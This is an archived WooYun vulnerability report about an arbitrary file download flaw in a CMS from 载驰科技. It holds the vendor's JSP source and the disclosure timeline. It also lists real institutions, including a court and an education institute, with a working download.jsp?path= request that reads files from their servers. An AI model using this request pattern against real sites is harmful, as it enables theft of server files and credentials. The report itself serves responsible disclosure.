当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133745

漏洞标题:某通用型CMS存在任意文件下载漏洞

相关厂商:石家庄载驰科技

漏洞作者: 日出东方

提交时间:2015-08-15 12:48

修复时间:2015-10-01 14:58

公开时间:2015-10-01 14:58

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-15: 细节已通知厂商并且等待厂商处理中
2015-08-17: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-27: 细节向核心白帽子及相关领域专家公开
2015-09-06: 细节向普通白帽子公开
2015-09-16: 细节向实习白帽子公开
2015-10-01: 细节向公众公开

简要描述:

某通用型CMS存在任意文件下载漏洞
乌云搜了搜还没有记录,有没有RMB奖励。。。

详细说明:

石家庄载驰科技
存在任意文件下载漏洞。。。

漏洞证明:

google 一下
技术支持:载驰科技

1.png

2.png


用户不少。有学校,有法院。。。
石家庄新华区人民法院
http://**.**.**.**/dynamic/download.jsp?path=/dynamic/download.jsp
石家庄美术馆
http://**.**.**.**/dynamic/download.jsp?path=/dynamic/download.jsp
石家庄教育科学研究所
http://**.**.**.**/dynamic/download.jsp?path=/dynamic/download.jsp
河北水利网
http://**.**.**.**/dynamic/download.jsp?path=/dynamic/download.jsp
....
....
这个download.jsp文件内容
<%@ include file="base.jsp"%>
<%
response.setCharacterEncoding("ISO-8859-1");
ApplicationContext ctx = WebApplicationContextUtils.getWebApplicationContext(getServletConfig().getServletContext());
**.**.**.**mon.util.Properties prop = **.**.**.**mon.util.Properties.getInstance();
Dao dao = (Dao) ctx.getBean("dao");
String path = request.getParameter("path");
if(path!=null){
String fname = path.substring(path.lastIndexOf(File.separator) + 1);
**.**.**.**.FileInputStream fs = null;
CmsWeb web = (CmsWeb) dao.getByID(CmsWeb.class, webId);
try {
if (web != null) {
String filePath = prop.getAppPath() + prop.getText("sitedir") + File.separator + web.getWebPath() + path;
fs = new **.**.**.**.FileInputStream(new **.**.**.**.File(filePath));
}
} catch (**.**.**.**.FileNotFoundException e) {
e.printStackTrace();
}
response.setContentType("APPLICATION/x-download");
response.setHeader("Content-Disposition", "attachment; filename=\"" + fname + "\"");
int b = 0;
try {
**.**.**.**.PrintWriter out1 = response.getWriter();
while ((b = fs.read()) != -1) {
out1.write(b);
}
fs.close();
out1.close();
} catch (Exception e) {
e.printStackTrace();
}
}
%>
对下载路径没有限制,导致可以下载任意文件。。对吧。我java 很ja 的

修复方案:

121

版权声明:转载请注明来源 日出东方@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-17 14:57

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给河北分中心,由其后续协调网站管理单位处置。

最新状态:

暂无